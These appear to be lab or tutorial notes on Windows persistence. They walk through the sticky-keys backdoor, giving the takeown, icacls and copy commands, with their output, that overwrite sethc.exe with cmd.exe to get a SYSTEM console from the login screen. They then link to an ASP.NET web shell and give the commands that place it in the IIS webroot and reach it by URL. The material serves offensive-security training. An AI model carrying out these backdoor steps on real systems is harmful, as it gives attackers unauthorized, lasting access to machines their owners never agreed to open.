- After pressing SHIFT 5 times, Windows will execute the binary in
C:\Windows\System32\sethc.exe. - If we are able to replace such binary for a payload of our preference, we can then trigger it with the shortcut. Interestingly, we can even do this from the login screen before inputting any credentials.
- A straightforward way to backdoor the login screen consists of replacing
sethc.exewith a copy ofcmd.exe. - That way, we can spawn a console using the sticky keys shortcut, even from the logging screen.
- To overwrite
sethc.exe, we first need to take ownership of the file and grant our current user permission to modify it. - Only then will we be able to replace it with a copy of
cmd.exe. We can do so with the following commands: - If you notice the compromised target is hosting a web server, we can take advantage of this.
- Download A ASP.NET web shell.
- https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmdasp.aspx
- Transfer it to the victim machine and move it into the webroot, which by default is located in the
C:\inetpub\wwwrootdirectory:
takeown /f c:\Windows\System32\sethc.exe
SUCCESS: The file (or folder): "c:\Windows\System32\sethc.exe" now owned by user "PURECHAOS\Administrator".
icacls C:\Windows\System32\sethc.exe /grant Administrator:F
processed file: C:\Windows\System32\sethc.exe
Successfully processed 1 files; Failed processing 0 files
copy c:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe
Overwrite C:\Windows\System32\sethc.exe? (Yes/No/All): yes
1 file(s) copied.
move shell.aspx C:\inetpub\wwwroot\
- After doing so, lock your session from the start menu:
- You should now be able to press SHIFT five times to access a terminal with SYSTEM privileges directly from the login screen:
- We can then run commands from the web server by pointing to the following URL:
http://MACHINE_IP/shell.aspx